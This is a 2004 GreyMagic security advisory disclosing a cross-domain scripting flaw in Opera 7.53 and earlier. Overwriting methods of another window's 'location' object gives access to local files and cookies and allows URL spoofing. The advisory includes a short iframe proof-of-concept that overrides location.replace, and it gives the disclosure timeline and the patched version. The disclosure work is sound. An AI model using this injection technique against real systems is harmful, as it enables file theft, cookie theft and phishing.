GreyMagic Security Advisory GM#008-OP
=====================================

By GreyMagic Software, 05 Aug 2004.

Available in HTML format at
http://www.greymagic.com/security/advisories/gm008-op/.

Topic: Location, Location, Location.

Discovery date: 19 Jul 2004.

Affected applications:
======================

Opera 7.53 and prior on Windows, Linux and Mac. 


Introduction:
=============

On 04-Feb-2003 GreyMagic released an advisory [1] concerning Opera's
security model in v7.0. The advisory depicted several flaws in Opera's
model, one of them allowed for an attacker to overwrite native and custom
functions in a victim window. When the victim web-page executed such
function, the attacker's code executed with the victim's privileges. 

Opera tried to prevent such scenarios in Opera 7.01, by blocking
write-access to objects on the victim window. 

[1] http://www.greymagic.com/security/advisories/gm002-op/

Discussion: 
===========

Unfortunately, Opera failed to block write-access to the often-used
"location" object. 

By overwriting methods in this object, an attacker can gain immediate script
access to any web-page that uses one of these methods. This includes both
web-pages in foreign domains and the victim's local file system. 

The impacts of this vulnerability include: 

* Read-access to files on the victim's file system 
* Read-access to lists of files and folders on the victim's file system 
* Read-access to emails written or received by M2, Opera's mail program 
* Cookie theft 
* URL spoofing (phishing) 
* Track user browsing history 
* Much more... 

Several methods are candidates for such attacks: assign(), replace(),
valueOf() and toString(). The first two would be triggered only when the
victim explicitly calls them. The latter ones would be called in many
implicit cases, including: 

* str+=location;
* decodeURI(location);
* location*7;
* location+"";

And many others... 

In order to gain access to the "file://" protocol, and hence to the entire
file-system, an attacker needs to know of an HTML file in the victim's file
system that actually makes a call to a method in the location object. Such
file was included in virtually all Windows Operating Systems, it is named
"CiAdmin.htm" and it can be found in a very predictable path -
%SystemRoot%/Help/. 


Exploit: 
========

To exploit this vulnerability an attacker can use a simple <iframe>,
pointing to the victim web-page, and inject the malicious code into its
window. Here's an oversimplified example: 

<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
    var oVictim=frames[0];
    oVictim.location.href="file://localhost/c:/winnt/help/ciadmin.htm";
    oVictim.location.replace=function () {
        oVictim.alert("We now have full file system access using
"+location.href);
    }
}
</script>

This code demonstrates how the vulnerability works, but it is not likely to
succeed in exploiting it by itself. This happens because the malicious code
must be injected in the time-gap between page initiation and page script
execution. This leaves a very narrow window for an attacker to inject code,
but with a bit of scripting this window of opportunity can easily be found.
The demonstrations linked below use simple brute-force and retry mechanisms
to inject our code successfully. 


Demonstration:
==============

GreyMagic prepared two proof-of-concept demonstrations of this
vulnerability, they are available at
http://www.greymagic.com/security/advisories/gm008-op/.


Solution: 
=========

GreyMagic informed Opera of the vulnerability on 22-Jul-2004. A new version
(7.54) was officially released on 05-Aug-2004 to address this flaw.


Tested on: 
==========

Opera 7.52.
Opera 7.53.


Disclaimer: 
===========

The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind. 

GreyMagic Software is not liable for any direct or indirect damages caused
as a result of using the information or demonstrations provided in any part
of this advisory. 

- Copyright © 2004 GreyMagic Software.